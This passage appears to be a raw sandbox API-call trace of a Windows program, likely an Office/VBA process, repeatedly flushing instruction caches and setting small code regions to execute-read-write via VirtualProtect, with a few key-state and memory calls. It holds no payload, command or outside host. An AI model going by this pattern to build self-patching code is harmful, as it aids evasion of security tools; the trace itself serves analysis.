[0112.143] GetCurrentProcess () returned 0xffffffff [0112.144] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601774, dwSize=0x14) returned 1 [0112.144] VirtualProtect (in: lpAddress=0xf601774, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.144] GetCurrentProcess () returned 0xffffffff [0112.144] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601775, dwSize=0x2) returned 1 [0112.144] GetCurrentProcess () returned 0xffffffff [0112.144] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601794, dwSize=0x14) returned 1 [0112.144] VirtualProtect (in: lpAddress=0xf601794, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.144] GetCurrentProcess () returned 0xffffffff [0112.144] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601795, dwSize=0x2) returned 1 [0112.144] GetCurrentProcess () returned 0xffffffff [0112.144] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017b4, dwSize=0x14) returned 1 [0112.145] VirtualProtect (in: lpAddress=0xf6017b4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.145] GetCurrentProcess () returned 0xffffffff [0112.145] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017b5, dwSize=0x2) returned 1 [0112.145] GetCurrentProcess () returned 0xffffffff [0112.145] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017d4, dwSize=0x14) returned 1 [0112.145] VirtualProtect (in: lpAddress=0xf6017d4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.145] GetCurrentProcess () returned 0xffffffff [0112.145] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017d5, dwSize=0x2) returned 1 [0112.145] GetCurrentProcess () returned 0xffffffff [0112.146] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017f4, dwSize=0x14) returned 1 [0112.146] VirtualProtect (in: lpAddress=0xf6017f4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.146] GetCurrentProcess () returned 0xffffffff [0112.146] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017f5, dwSize=0x2) returned 1 [0112.146] GetCurrentProcess () returned 0xffffffff [0112.146] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601814, dwSize=0x14) returned 1 [0112.146] VirtualProtect (in: lpAddress=0xf601814, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.146] GetCurrentProcess () returned 0xffffffff [0112.146] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601815, dwSize=0x2) returned 1 [0112.146] GetCurrentProcess () returned 0xffffffff [0112.146] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601834, dwSize=0x14) returned 1 [0112.146] VirtualProtect (in: lpAddress=0xf601834, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.147] GetCurrentProcess () returned 0xffffffff [0112.147] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601835, dwSize=0x2) returned 1 [0112.147] GetCurrentProcess () returned 0xffffffff [0112.147] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601854, dwSize=0x14) returned 1 [0112.147] VirtualProtect (in: lpAddress=0xf601854, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.147] GetCurrentProcess () returned 0xffffffff [0112.147] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601855, dwSize=0x2) returned 1 [0112.147] GetCurrentProcess () returned 0xffffffff [0112.147] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601874, dwSize=0x14) returned 1 [0112.147] VirtualProtect (in: lpAddress=0xf601874, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.148] GetCurrentProcess () returned 0xffffffff [0112.148] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601875, dwSize=0x2) returned 1 [0112.148] GetCurrentProcess () returned 0xffffffff [0112.148] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0048, dwSize=0x14) returned 1 [0112.148] VirtualProtect (in: lpAddress=0xf5d0048, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.148] GetCurrentProcess () returned 0xffffffff [0112.148] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0049, dwSize=0x2) returned 1 [0112.148] GetCurrentProcess () returned 0xffffffff [0112.148] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0068, dwSize=0x14) returned 1 [0112.148] VirtualProtect (in: lpAddress=0xf5d0068, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.149] GetCurrentProcess () returned 0xffffffff [0112.149] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0069, dwSize=0x2) returned 1 [0112.149] GetCurrentProcess () returned 0xffffffff [0112.149] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0088, dwSize=0x14) returned 1 [0112.149] VirtualProtect (in: lpAddress=0xf5d0088, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.149] GetCurrentProcess () returned 0xffffffff [0112.149] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0089, dwSize=0x2) returned 1 [0112.149] GetCurrentProcess () returned 0xffffffff [0112.149] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00a8, dwSize=0x14) returned 1 [0112.150] VirtualProtect (in: lpAddress=0xf5d00a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.150] GetCurrentProcess () returned 0xffffffff [0112.150] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00a9, dwSize=0x2) returned 1 [0112.150] GetCurrentProcess () returned 0xffffffff [0112.150] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00c8, dwSize=0x14) returned 1 [0112.150] VirtualProtect (in: lpAddress=0xf5d00c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.150] GetCurrentProcess () returned 0xffffffff [0112.150] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00c9, dwSize=0x2) returned 1 [0112.151] GetCurrentProcess () returned 0xffffffff [0112.151] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00e8, dwSize=0x14) returned 1 [0112.151] VirtualProtect (in: lpAddress=0xf5d00e8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.151] GetCurrentProcess () returned 0xffffffff [0112.151] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00e9, dwSize=0x2) returned 1 [0112.151] GetCurrentProcess () returned 0xffffffff [0112.151] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0108, dwSize=0x14) returned 1 [0112.151] VirtualProtect (in: lpAddress=0xf5d0108, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.151] GetCurrentProcess () returned 0xffffffff [0112.151] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0109, dwSize=0x2) returned 1 [0112.151] GetCurrentProcess () returned 0xffffffff [0112.151] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0128, dwSize=0x14) returned 1 [0112.152] VirtualProtect (in: lpAddress=0xf5d0128, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.152] GetCurrentProcess () returned 0xffffffff [0112.152] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0129, dwSize=0x2) returned 1 [0112.152] GetCurrentProcess () returned 0xffffffff [0112.152] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0148, dwSize=0x14) returned 1 [0112.152] VirtualProtect (in: lpAddress=0xf5d0148, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.152] GetCurrentProcess () returned 0xffffffff [0112.152] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0149, dwSize=0x2) returned 1 [0112.153] GetCurrentProcess () returned 0xffffffff [0112.153] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0168, dwSize=0x14) returned 1 [0112.153] VirtualProtect (in: lpAddress=0xf5d0168, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.153] GetCurrentProcess () returned 0xffffffff [0112.153] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0169, dwSize=0x2) returned 1 [0112.153] GetCurrentProcess () returned 0xffffffff [0112.153] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0188, dwSize=0x14) returned 1 [0112.153] VirtualProtect (in: lpAddress=0xf5d0188, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.154] GetCurrentProcess () returned 0xffffffff [0112.154] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0189, dwSize=0x2) returned 1 [0112.154] GetCurrentProcess () returned 0xffffffff [0112.154] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01a8, dwSize=0x14) returned 1 [0112.154] VirtualProtect (in: lpAddress=0xf5d01a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.154] GetCurrentProcess () returned 0xffffffff [0112.154] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01a9, dwSize=0x2) returned 1 [0112.154] GetCurrentProcess () returned 0xffffffff [0112.154] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01c8, dwSize=0x14) returned 1 [0112.154] VirtualProtect (in: lpAddress=0xf5d01c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.155] GetCurrentProcess () returned 0xffffffff [0112.155] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01c9, dwSize=0x2) returned 1 [0112.155] GetCurrentProcess () returned 0xffffffff [0112.155] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01e8, dwSize=0x14) returned 1 [0112.155] VirtualProtect (in: lpAddress=0xf5d01e8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.155] GetCurrentProcess () returned 0xffffffff [0112.155] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01e9, dwSize=0x2) returned 1 [0112.155] GetCurrentProcess () returned 0xffffffff [0112.155] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0208, dwSize=0x14) returned 1 [0112.155] VirtualProtect (in: lpAddress=0xf5d0208, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.156] GetCurrentProcess () returned 0xffffffff [0112.156] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0209, dwSize=0x2) returned 1 [0112.156] GetCurrentProcess () returned 0xffffffff [0112.156] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0228, dwSize=0x14) returned 1 [0112.156] VirtualProtect (in: lpAddress=0xf5d0228, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.156] GetCurrentProcess () returned 0xffffffff [0112.156] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0229, dwSize=0x2) returned 1 [0112.156] GetCurrentProcess () returned 0xffffffff [0112.156] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b4868, dwSize=0x14) returned 1 [0112.156] VirtualProtect (in: lpAddress=0xc8b4868, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.157] GetCurrentProcess () returned 0xffffffff [0112.157] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b4869, dwSize=0x2) returned 1 [0112.157] GetCurrentProcess () returned 0xffffffff [0112.157] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b4888, dwSize=0x14) returned 1 [0112.157] VirtualProtect (in: lpAddress=0xc8b4888, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.157] GetCurrentProcess () returned 0xffffffff [0112.157] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b4889, dwSize=0x2) returned 1 [0112.157] GetCurrentProcess () returned 0xffffffff [0112.157] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b48a8, dwSize=0x14) returned 1 [0112.157] VirtualProtect (in: lpAddress=0xc8b48a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.172] GetCurrentProcess () returned 0xffffffff [0112.172] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b48a9, dwSize=0x2) returned 1 [0112.174] GetAsyncKeyState (vKey=3) returned 0 [0112.174] GetAsyncKeyState (vKey=3) returned 0 [0112.174] VarCmp (pvarLeft=0x197dcc, pvarRight=0x197dbc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.174] CRetailMalloc_Alloc () returned 0xcc1b0c8 [0112.174] memcpy (in: _Dst=0xd015168, _Src=0x1976bc, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0112.174] memcpy (in: _Dst=0xcc1b0e8, _Src=0x197724, _Size=0x18 | out: _Dst=0xcc1b0e8) returned 0xcc1b0e8 [0112.174] CRetailMalloc_Realloc () returned 0xcc1b0c8 [0112.174] CRetailMalloc_Free () returned 0x1 [0112.174] GetCurrentProcess () returned 0xffffffff [0112.174] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601714, dwSize=0x14) returned 1 [0112.174] VirtualProtect (in: lpAddress=0xf601714, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.175] GetCurrentProcess () returned 0xffffffff [0112.175] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601715, dwSize=0x2) returned 1 [0112.175] GetCurrentProcess () returned 0xffffffff [0112.175] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601734, dwSize=0x14) returned 1 [0112.175] VirtualProtect (in: lpAddress=0xf601734, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.176] GetCurrentProcess () returned 0xffffffff [0112.176] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601735, dwSize=0x2) returned 1 [0112.176] GetCurrentProcess () returned 0xffffffff [0112.176] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601754, dwSize=0x14) returned 1 [0112.176] VirtualProtect (in: lpAddress=0xf601754, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.176] GetCurrentProcess () returned 0xffffffff [0112.176] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601755, dwSize=0x2) returned 1 [0112.176] GetCurrentProcess () returned 0xffffffff [0112.176] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601774, dwSize=0x14) returned 1 [0112.176] VirtualProtect (in: lpAddress=0xf601774, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.177] GetCurrentProcess () returned 0xffffffff [0112.177] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601775, dwSize=0x2) returned 1 [0112.177] GetCurrentProcess () returned 0xffffffff [0112.177] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601794, dwSize=0x14) returned 1 [0112.177] VirtualProtect (in: lpAddress=0xf601794, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.178] GetCurrentProcess () returned 0xffffffff [0112.178] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601795, dwSize=0x2) returned 1 [0112.178] GetCurrentProcess () returned 0xffffffff [0112.178] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017b4, dwSize=0x14) returned 1 [0112.178] VirtualProtect (in: lpAddress=0xf6017b4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.178] GetCurrentProcess () returned 0xffffffff [0112.178] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017b5, dwSize=0x2) returned 1 [0112.178] GetCurrentProcess () returned 0xffffffff [0112.178] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017d4, dwSize=0x14) returned 1 [0112.178] VirtualProtect (in: lpAddress=0xf6017d4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.179] GetCurrentProcess () returned 0xffffffff [0112.179] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017d5, dwSize=0x2) returned 1 [0112.179] GetCurrentProcess () returned 0xffffffff [0112.179] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017f4, dwSize=0x14) returned 1 [0112.179] VirtualProtect (in: lpAddress=0xf6017f4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.180] GetCurrentProcess () returned 0xffffffff [0112.180] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017f5, dwSize=0x2) returned 1 [0112.180] GetCurrentProcess () returned 0xffffffff [0112.180] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601814, dwSize=0x14) returned 1 [0112.180] VirtualProtect (in: lpAddress=0xf601814, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.180] GetCurrentProcess () returned 0xffffffff [0112.180] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601815, dwSize=0x2) returned 1 [0112.180] GetCurrentProcess () returned 0xffffffff [0112.180] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601834, dwSize=0x14) returned 1 [0112.180] VirtualProtect (in: lpAddress=0xf601834, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.181] GetCurrentProcess () returned 0xffffffff [0112.181] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601835, dwSize=0x2) returned 1 [0112.181] GetCurrentProcess () returned 0xffffffff [0112.181] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601854, dwSize=0x14) returned 1 [0112.181] VirtualProtect (in: lpAddress=0xf601854, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.181] GetCurrentProcess () returned 0xffffffff [0112.181] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601855, dwSize=0x2) returned 1 [0112.182] GetCurrentProcess () returned 0xffffffff [0112.182] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601874, dwSize=0x14) returned 1 [0112.182] VirtualProtect (in: lpAddress=0xf601874, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.182] GetCurrentProcess () returned 0xffffffff [0112.182] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601875, dwSize=0x2) returned 1 [0112.182] GetCurrentProcess () returned 0xffffffff [0112.182] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0048, dwSize=0x14) returned 1 [0112.182] VirtualProtect (in: lpAddress=0xf5d0048, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.183] GetCurrentProcess () returned 0xffffffff [0112.183] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0049, dwSize=0x2) returned 1 [0112.183] GetCurrentProcess () returned 0xffffffff [0112.183] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0068, dwSize=0x14) returned 1 [0112.183] VirtualProtect (in: lpAddress=0xf5d0068, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.183] GetCurrentProcess () returned 0xffffffff [0112.183] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0069, dwSize=0x2) returned 1 [0112.184] GetCurrentProcess () returned 0xffffffff [0112.184] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0088, dwSize=0x14) returned 1 [0112.184] VirtualProtect (in: lpAddress=0xf5d0088, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.184] GetCurrentProcess () returned 0xffffffff [0112.184] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0089, dwSize=0x2) returned 1 [0112.184] GetCurrentProcess () returned 0xffffffff [0112.184] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00a8, dwSize=0x14) returned 1 [0112.184] VirtualProtect (in: lpAddress=0xf5d00a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.185] GetCurrentProcess () returned 0xffffffff [0112.185] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00a9, dwSize=0x2) returned 1 [0112.185] GetCurrentProcess () returned 0xffffffff [0112.185] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00c8, dwSize=0x14) returned 1 [0112.185] VirtualProtect (in: lpAddress=0xf5d00c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.186] GetCurrentProcess () returned 0xffffffff [0112.186] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00c9, dwSize=0x2) returned 1 [0112.186] GetCurrentProcess () returned 0xffffffff [0112.186] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00e8, dwSize=0x14) returned 1 [0112.186] VirtualProtect (in: lpAddress=0xf5d00e8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.186] GetCurrentProcess () returned 0xffffffff [0112.186] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00e9, dwSize=0x2) returned 1 [0112.186] GetCurrentProcess () returned 0xffffffff [0112.186] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0108, dwSize=0x14) returned 1 [0112.186] VirtualProtect (in: lpAddress=0xf5d0108, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.187] GetCurrentProcess () returned 0xffffffff [0112.187] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0109, dwSize=0x2) returned 1 [0112.187] GetCurrentProcess () returned 0xffffffff [0112.187] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0128, dwSize=0x14) returned 1 [0112.187] VirtualProtect (in: lpAddress=0xf5d0128, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.188] GetCurrentProcess () returned 0xffffffff [0112.188] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0129, dwSize=0x2) returned 1 [0112.188] GetCurrentProcess () returned 0xffffffff [0112.188] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0148, dwSize=0x14) returned 1 [0112.188] VirtualProtect (in: lpAddress=0xf5d0148, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.188] GetCurrentProcess () returned 0xffffffff [0112.188] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0149, dwSize=0x2) returned 1 [0112.188] GetCurrentProcess () returned 0xffffffff [0112.188] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0168, dwSize=0x14) returned 1 [0112.188] VirtualProtect (in: lpAddress=0xf5d0168, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.189] GetCurrentProcess () returned 0xffffffff [0112.189] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0169, dwSize=0x2) returned 1 [0112.189] GetCurrentProcess () returned 0xffffffff [0112.189] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0188, dwSize=0x14) returned 1 [0112.189] VirtualProtect (in: lpAddress=0xf5d0188, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.190] GetCurrentProcess () returned 0xffffffff [0112.190] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0189, dwSize=0x2) returned 1 [0112.190] GetCurrentProcess () returned 0xffffffff [0112.190] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01a8, dwSize=0x14) returned 1 [0112.190] VirtualProtect (in: lpAddress=0xf5d01a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.190] GetCurrentProcess () returned 0xffffffff [0112.190] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01a9, dwSize=0x2) returned 1 [0112.190] GetCurrentProcess () returned 0xffffffff [0112.191] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01c8, dwSize=0x14) returned 1 [0112.191] VirtualProtect (in: lpAddress=0xf5d01c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.191] GetCurrentProcess () returned 0xffffffff [0112.191] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01c9, dwSize=0x2) returned 1 [0112.191] GetCurrentProcess () returned 0xffffffff [0112.191] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01e8, dwSize=0x14) returned 1 [0112.191] VirtualProtect (in: lpAddress=0xf5d01e8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.192] GetCurrentProcess () returned 0xffffffff [0112.192] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01e9, dwSize=0x2) returned 1 [0112.192] GetCurrentProcess () returned 0xffffffff [0112.192] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0208, dwSize=0x14) returned 1 [0112.192] VirtualProtect (in: lpAddress=0xf5d0208, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.192] GetCurrentProcess () returned 0xffffffff [0112.192] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0209, dwSize=0x2) returned 1 [0112.192] GetCurrentProcess () returned 0xffffffff [0112.192] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0228, dwSize=0x14) returned 1 [0112.193] VirtualProtect (in: lpAddress=0xf5d0228, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.193] GetCurrentProcess () returned 0xffffffff [0112.193] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0229, dwSize=0x2) returned 1 [0112.193] GetCurrentProcess () returned 